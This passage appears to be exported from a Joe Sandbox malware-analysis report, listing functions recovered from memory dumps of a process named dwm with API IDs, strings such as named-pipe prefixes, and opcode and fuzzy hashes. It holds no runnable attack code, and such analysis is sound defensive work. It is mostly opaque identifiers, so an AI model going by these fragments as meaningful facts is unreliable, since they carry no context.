                                                                                Function 000001160CBF3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: b60d945665661dfdd3a418f256b783154abc990a5eb3c260b0a1a8428369d64f
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: EF118835260F808AE7948B12E8443D9B7A0F78CFE5F180264FF1A877A8CB3AC9158744
                                                                                Function 000001160CBE2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: 3b51e744a85cbf46458d55d723a01e3b83cbf2ae4066660c87d7deb4b190fe3c
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 92318E36701F5186EA18DF16E9407EA67A4FB5CF84F0841A4BF4847B6AFF36C4A1A740
                                                                                Function 000001160CBECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: c0ab62e2f35622036f03bde80c5d5bf817e5228cb12c0170516359f531fc01fc
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: 75115C30200B8046FA6CA77195553ED62466B9CBB4F2847E4BA36467DEFF6A8802B600
                                                                                Function 000001160CBE199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 581595d2693ef0f1e2eb2c5f1b19eadae3bdc356db7fcbf3ada764333d5ee646
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A7015B35340F4086EA28DB56A4487DA63A5F78CFC4F5840B5EF5943759DF39C94AC700
                                                                                Function 000001160CBE36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: eb78499ad2163625bc5385763271bd5f74659e694133aceb65f3d280cb71e29c
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: C70157B8611F4086EB289B22E8497DA73A4BB5CB82F1404A4EF4907768EF3EC549D700
                                                                                Function 000001160CBE8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: f668ebae7a626b22d9dbcf421f7ee727c1ac91f227238c048c81f3755eb3b7c4
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 51518C32A41B00DAEB18CB25E848BD93796F348F88F5085A4FB164778CFB76C849E701
                                                                                Function 000001160CBE1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: 2e86e042b2e4b659e6ba9be687937ce213fa3ee14a4a065a8680f4058dc28321
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 6EF08C36300B4082EB348F24E8843EA6760F74CB88F945060EB4946A59DB7EC68EDB00
                                                                                Function 000001160CBE3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 3fec79fad032051565755a825fa537cda261f8238bcd5913236774933117935a
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: F0F05E38604F8082EA088B16B9142DA63A4AB4CFC0F0441A0FF4607B2DDF69C4469700
                                                                                Function 000001160CBEBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: a5eb62537fb6bfe5a65e3d9d1881e9253be8d97531b25be878754bf50b40c016
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 03F06275211F0586EB188B24E4443D96360EB8CB61F5402D9FF6A453E8DF2EC046A340
                                                                                Function 000001160CBE5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction ID: c4f96b38a82fae5d64a94be9159ff439f89e26c302612a513b778999d4a90a11
                                                                                • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction Fuzzy Hash: 6761B676519B44C6EB68CB16E44439AB7A0F388B98F100195FB8E47BACEB7EC554DB00
                                                                                Function 000001160CBC3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 7d068ccff395479a1a8ca0a41ff6f0b5cb44583eea117e209bbb97da9ecab023
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: E2117332A94F5111FAAC2528E4D63F911C16B5D374FC9CEA8BB66067FECB26CC417111
                                                                                Function 000001160CBF4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a2d60e80db169666c09dbc83c644de45b92b3f83fc807ebd1f64cfc93a8147fb
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 7011913AAD0F5419F76C1568D4513E719406B6C3B8F0806A4BB76067DECB26CA477A00
                                                                                Function 000001160CBBF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 228dfb1950d3e10129388516a8d777bff4db30c7cbbd236b43f5bc3b611ebec5
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: DC61B53A500F4046FA6DDBA9EDC03FA6BA0E74D740F504895FB0A177ACDBB6C842A300
                                                                                Function 000001160CBEAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ddc40d19ef3e0178d7ccbb8309058d683924762c3a0cfda7ada99cbc9f56b684
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 51615632A00F848AEB28DF65D4803DD7BA4F758B88F045296EF4917B98EB39D595E700
                                                                                Function 000001160CBBA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 5beecf0a36cf43612fa9d680f2f1ada95d0d57731be6607b75cf6f462d35859a
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: EA518E32900B80CAEB788B15D5943DD77A0F759B84F184256FB9987BD9CBBAD490F700
                                                                                Function 000001160CBEAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 68162fd14037d65bd51b88a781ac837c3e6c9958c476ba7a276518bf1858e3f8
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 87517F72100B808AEF688B2594843D97BA8F358F85F1881D5FB5987BD9EB39D450F740
                                                                                Function 000001160CBB8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: d5ac5dc8e94e280de30f0c437891bb484453b0f749df0883a583c9f2b51e0737
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5A51AB32601B008AEB19CF15E584BDD3799F358B98F5481A4EB56437CCEBB7DC41A704
                                                                                Function 000001160CBB83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 937b1d79c2fe4e9b3d083d7ebb74d246155f8325fc491165d499852437db3792
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 64319F32201B409AEB29DF11E8847D977A8F348B98F558494FF9A0779CDBBBD940E704
                                                                                Function 000001160CBF2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 5634b3be86054775eb403e1cfcadd77b1129b5c8b23e7f5f590b2b3f7070c448
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 84D1DC76B04B808DE719CFA9D4402DC3BA1E348B98F104296EF9A97B99DB39C507D740
                                                                                Function 000001160CBE14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: ec94c9d706daf64bcb37ad081bbb02de0cfb43fc9d8614868df8d0b45d56d9c8
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: FA01253A680F90CAE708DB66A9041CA67A0F78CF81F045465FF4A4372ADF39C1529740
                                                                                Function 000001160CBF2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: ad6c01535a3d76188b280e0df103d07a856b17cca55eb8be6b4103dfbdd2e88a
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: 8291BF7A740F508DF7689F6594903ED2BA0B708B88F144189EF0A67B9DDB36C487E702
                                                                                Function 000001160CBE7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 9453d27a776947573b335071d568a83c08c833795706cd411cfedd74c6b4cdd3
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 9A111836750F018AEB048B60E8553E833A4F71DB68F441E21EF6D467A8DB79C2999380
                                                                                Function 000001160CBE253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: e0164dc80599d5eb54bd09aa18f748ebc82bd28ed61a0dbc5e2bff2ec621aa33
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 9771B236200F8185E76DDE2A98443EA6798F39DF84F540096FF0A53B9DEB36C945A701
                                                                                Function 000001160CBB9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: e1a07e00b80321661de230908c4557540772c8d53387254dfc256e34213d22d7
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: C7614232A00F848AEB28DF65D4803ED7BB4F748B98F144256EF4917B98DBBAD195D700
                                                                                Function 000001160CBE2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 84e661a99b6468e4cba836f63f673b785624e3faea9be0b5e417c18d63dcb6d4
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 6C51D172204F8181E66C9A29A1683FA67A9F78DF40F4401E5FF5903B9DEB3BC905E741
                                                                                Function 000001160CBF26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 4756c50ec3f1faefda294566c70c405a5f701fb1db533bc7407012ad3bd935dd
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 4141AF76314B848AEB248F25E8443EAB7A0F798B94F504021FF4E87798EB3DC442DB41
                                                                                Function 000001160CBE94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: 7f12e5e6ec11e533483d7b237406bdc11dae28fe43a1e87cbff7d2d0aaaa3a2f
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: F2111936614F8082EB658B15E4402DAB7E5F788B94F5842A0EF8D07758EF39C955DB00
                                                                                Function 000001160CBB7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
